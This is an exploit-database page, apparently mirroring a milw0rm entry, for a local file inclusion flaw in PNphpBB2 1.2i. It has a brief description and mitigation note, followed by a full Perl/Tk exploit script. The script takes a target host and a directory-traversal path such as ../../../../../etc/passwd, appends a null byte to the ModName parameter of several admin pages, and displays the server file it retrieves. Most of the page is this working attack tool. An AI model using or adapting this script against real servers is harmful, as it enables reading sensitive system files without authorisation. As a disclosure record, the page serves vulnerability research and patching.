header-logo
Suggest Exploit
vendor:
PNphpBB2
by:
athos
7.5
CVSS
HIGH
LFI (Local File Inclusion)
CWE
Product Name: PNphpBB2
Affected Version From: 1.2i
Affected Version To: 1.2i
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

PNphpBB2 <= 1.2i (ModName) Multiple LFI Exploit

This exploit targets PNphpBB2 version 1.2i (ModName) and allows an attacker to include local files on the server. It can be used to read sensitive files such as the /etc/passwd file.

Mitigation:

The vendor should release a patch to fix the LFI vulnerability. In the meantime, users can mitigate the risk by restricting access to the vulnerable component or by implementing input validation and sanitization.
Source

Exploit-DB raw data:

#!/usr/bin/perl
# PNphpBB2 <= 1.2i (ModName) Multiple LFI Exploit
# by athos - staker[at]hotmail[dot]it

use strict;
use LWP::Simple;
use Tk;

my ($host,$file,$about);

my $poc = "PNphpBB2 <= 1.2i (ModName) Multiple LFI Exploit";
my $obj = new MainWindow(-background => '#E4E4E4');

$obj->title($poc);
$obj->minsize(500,200);
$obj->maxsize(500,200);

text('Host/Path (ex: http://localhost/cms)');
input1();
text('Local File (ex: ../../../../../etc/passwd');
input2();
button();
Button();

print $host;

sub text {
   
   my $load = undef;
   my $text = shift;
   
   $load = $obj->Label(
                  -text  => $text,
                  -font  => 'monospace 8',
                  -foreground   => '#000000',
                  -background   => '#E4E4E4',
                )->pack(-anchor => 'n');
   return $load;           
}


sub input1 {
   
   return $obj->Entry(
                  -textvariable => \$host,
                  -font         => 'monospace 8',
                  -foreground   => '#000000',
                  -background   => '#E4E4E4',
                  )->pack(-anchor => 'n');
   
}


sub input2 {
   
   return $obj->Entry(
                  -textvariable => \$file,
                  -font         => 'monospace 8',
                  -foreground   => '#000000',
                  -background   => '#E4E4E4',
                  )->pack(-anchor => 'n');
   
}

sub button {

   return $obj->Button(
                -text    => 'Exploit',
                -font    => 'monospace 8',
                -foreground   => '#000000',
                -background   => '#E4E4E4',
                -command => sub { exploit(); }
               )->pack(-anchor => 'n');
}

sub Button {
   
   return $obj->Button(
                -text    => 'Credits',
                -font    => 'monospace 8',
                -foreground   => '#000000',
                -background   => '#E4E4E4',
                -command => sub { about(); }
               )->pack(-anchor => 'n');
}

sub exploit {
   
   my $enum = 0;
   my @path = (
             '/admin/admin_words.php?ModName=',
             '/admin/admin_groups_reapir.php?ModName=',
             '/admin/admin_smilies.php?ModName=',
             '/admin/admin_ranks.php?ModName=',
             '/admin/admin_styles.php?ModName=',
             '/admin/admin_users.php?ModName=',
           );  
   
   if(get($path[$enum]) =~ /no such file/i) {
      $enum++;
   }
   else {
      window(get($host.$path[$enum].$file.'%00'));
   }            
}


sub window {
   
   my $A = shift;
   my $T = new MainWindow(-background => '#E4E4E4');
   
   $T->title('Exploit Content');
   
   return $T->Label(
              -text       => $A,
              -font       => 'monospace 8',
              -background => '#E4E4E4',
              -foreground => '#000000',
            )->pack(-anchor => 'n');  
}            

sub about {
   
   $about .= $poc;
   $about .= "\nby athos - staker[at]hotmail[dot]it\r";
   $about .= "\ndownload on http://www.pnphpbb.com\r";
   $about .= "\nregister globals  = 1\r";
   $about .= "\nmagic quotes gpc = 0\r\n";
   
   my $H = new MainWindow(-background => '#E4E4E4');
   
   $H->title('About');
   $H->minsize(500,200);
   $H->maxsize(500,200);
   
   return $H->Label(
              -text       => $about,
              -font       => 'monospace 8',
              -background => '#E4E4E4',
              -foreground => '#000000',
            )->pack(-anchor => 'n');
}



MainLoop;

# milw0rm.com [2009-01-04]

Navigation

Suggest Exploit

Services By CQR